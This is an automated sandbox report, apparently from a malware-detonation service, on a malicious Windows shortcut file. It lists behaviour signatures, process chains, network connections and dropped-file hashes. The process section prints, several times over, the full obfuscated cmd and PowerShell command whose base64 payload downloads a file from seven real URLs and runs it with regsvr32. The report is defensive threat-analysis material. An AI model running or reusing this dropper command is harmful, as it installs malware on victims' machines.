Analysis Overview
SHA256
e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66
Threat Level: Likely malicious
The file e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
An obfuscated cmd.exe command-line is typically used to evade detection.
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 14:18
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 14:18
Reported
2024-11-13 14:20
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2348 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2348 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2348 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2228 wrote to memory of 2972 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2228 wrote to memory of 2972 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2228 wrote to memory of 2972 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c ehGG/roADSvchwtY4+9p3wHUictq4tqWddREKHzC9tLWlUd+pVah1coZrvwoaD30SW14tx00||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
Network
Files
memory/2972-40-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp
memory/2972-42-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/2972-41-0x000000001B680000-0x000000001B962000-memory.dmp
memory/2972-43-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-44-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-46-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-45-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-47-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-48-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 14:18
Reported
2024-11-13 14:20
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2244 wrote to memory of 3636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2244 wrote to memory of 3636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3636 wrote to memory of 3612 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3636 wrote to memory of 3612 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3612 wrote to memory of 4244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\regsvr32.exe |
| PID 3612 wrote to memory of 4244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\regsvr32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c ehGG/roADSvchwtY4+9p3wHUictq4tqWddREKHzC9tLWlUd+pVah1coZrvwoaD30SW14tx00||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
C:\Windows\system32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IwnMs\cHKEstjhfJ.uDD
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | masterflix.com | udp |
| NL | 185.232.250.84:80 | masterflix.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.250.232.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | masyuk.com | udp |
| SG | 128.199.252.32:80 | masyuk.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.252.199.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lekarkivet.se | udp |
| DK | 185.20.205.16:80 | lekarkivet.se | tcp |
| DK | 185.20.205.16:443 | lekarkivet.se | tcp |
| US | 8.8.8.8:53 | martyr.dk | udp |
| FI | 65.108.197.134:80 | martyr.dk | tcp |
| US | 8.8.8.8:53 | martingrant.com | udp |
| US | 8.8.8.8:53 | 16.205.20.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.197.108.65.in-addr.arpa | udp |
| US | 52.20.84.62:80 | martingrant.com | tcp |
| US | 8.8.8.8:53 | www.atom.com | udp |
| US | 8.8.8.8:53 | lemoncine.com | udp |
| US | 104.22.72.252:443 | www.atom.com | tcp |
| US | 31.170.160.89:80 | lemoncine.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.169.67:80 | c.pki.goog | tcp |
| US | 31.170.160.89:443 | lemoncine.com | tcp |
| US | 8.8.8.8:53 | 62.84.20.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.72.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.160.170.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | mandom.co.id | udp |
| GB | 172.217.169.35:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 172.217.169.67:80 | o.pki.goog | tcp |
| ID | 103.150.194.50:80 | mandom.co.id | tcp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| ID | 103.150.194.50:443 | mandom.co.id | tcp |
| US | 8.8.8.8:53 | 50.194.150.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/3612-0-0x00007FFA81943000-0x00007FFA81945000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4212dy3d.okg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3612-10-0x0000025FAECA0000-0x0000025FAECC2000-memory.dmp
memory/3612-11-0x00007FFA81940000-0x00007FFA82401000-memory.dmp
memory/3612-12-0x00007FFA81940000-0x00007FFA82401000-memory.dmp
memory/3612-13-0x0000025FC9E20000-0x0000025FCA5C6000-memory.dmp
C:\Users\Admin\AppData\Local\IwnMs\cHKEstjhfJ.uDD
| MD5 | 9e9b48ae75ae39fd45ebf6799c9668d8 |
| SHA1 | 7ed5cac9a268359ac09719dbbf354a83c23b1236 |
| SHA256 | bd19fca5c89301abcf7cceaa75294bc7981f1a4bea7ffeb29260c9716960f761 |
| SHA512 | c4b49773eba7ac113669f30444142bfb830b51f577795bcce45ebe382271f2f07a785fe47d10b5d18817e13bb7551563814552d174eee9f6e6f08c448ab31723 |
memory/3612-40-0x00007FFA81940000-0x00007FFA82401000-memory.dmp